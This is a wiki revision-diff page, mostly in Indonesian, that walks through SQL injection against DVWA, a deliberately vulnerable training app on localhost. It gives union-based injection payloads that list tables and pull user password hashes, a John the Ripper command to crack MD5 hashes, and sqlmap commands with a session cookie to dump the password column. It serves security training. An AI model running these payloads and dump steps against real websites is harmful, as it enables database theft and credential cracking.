Difference between revisions of "DVWA: SQLi blind"

From OnnoWiki
Jump to navigation Jump to search
 
(4 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
DVWA-BLIND SQL INJECTION : LOW Level
 
DVWA-BLIND SQL INJECTION : LOW Level
  
1. Open Local host  http://localhost/dvwa
+
* Buka DVWA, misalnya http://localhost/DVWA-1.9
  
 
  Username :  Admin
 
  Username :  Admin
 
  Password : Password
 
  Password : Password
  
3.Select SQL Injection BLIND and  column ID issued 1' and 1=1#
+
* Pilih SQL Injection BLIND dan dalam kolom ID masukan
  
 +
1' and 1=1#
 
  1' and 1=1 order by 2 #
 
  1' and 1=1 order by 2 #
 +
ID: 'or' 1=1--
  
5.ID: 'or' 1=1--
+
Kita akan lihat ada 5 user
  
we can see there are 5 user
+
* Melihat informasi table
 
 
5. now see information table
 
  
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 +
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
  
6..1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
+
* Melihat informasi table name dari table user
 
 
7. Information table name from table user
 
  
 
  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
 
  1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'' #
  
8. on the last lets see  user name and password
+
* Terakhir lihat username dan password
  
 
  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
 
  1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  
9. we will crack the md5 password
+
* Crack md5 password
 
 
copy the passowrd into kwrite and save with name hash
 
next
 
 
 
 
 
root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
 
 
 
 
 
OK GOOD LUCK
 
 
 
Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.
 
 
 
1. afer login in DVWA and choose DVWA Securty Low
 
2. follow this picture
 
 
 
In User ID write '1
 
 
 
than show
 
 
 
we have an error and my conclusion that this is sql injection, not blind.
 
 
 
3. copy url and open your console
 
 
 
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
 
 
 
 
  
 +
copy hasil password hash yang diperoleh, save misalnya dengan nama hash
  
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
+
Lakukan
we get this information by tamer data ini browser's tools
 
  
4. Now Looking for Database tables
+
  root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
 
  
 +
==Exploit DVWA menggunakan SQLmap==
  
5. netx search User's Table
+
* Login ke DVWA
 +
* Pilih DVWA Security Low
 +
* Pada user ID tulis '1
 +
* Jalankan addon tamer di browser
 +
* Lakukan di terminal,
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  
 +
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
  
6. Look at field password.. we will dump it
+
di peroleh dari addon tamer di browser.
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
+
* lihat tables
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  
OK GOOD LUCK
+
* lihat kolom di user tabel
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  
 +
* lihat field password & dump
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
  
 
==Referensi==
 
==Referensi==
  
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html
 
* http://scxo1oc06c.blogspot.co.id/2012/02/dvwa-blind-sql-injection-low-level.html

Latest revision as of 07:51, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level

Username :  Admin
Password : Password
  • Pilih SQL Injection BLIND dan dalam kolom ID masukan
1' and 1=1#
1' and 1=1 order by 2 #
ID: 'or' 1=1--

Kita akan lihat ada 5 user

  • Melihat informasi table
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
  • Melihat informasi table name dari table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
  • Terakhir lihat username dan password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
  • Crack md5 password
copy hasil password hash yang diperoleh, save misalnya dengan nama hash

Lakukan

 root@bt:/pentest/passwords/john#./john --format=raw-md5 hash 


Exploit DVWA menggunakan SQLmap

  • Login ke DVWA
  • Pilih DVWA Security Low
  • Pada user ID tulis '1
  • Jalankan addon tamer di browser
  • Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

  • lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  • lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  • lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump

Referensi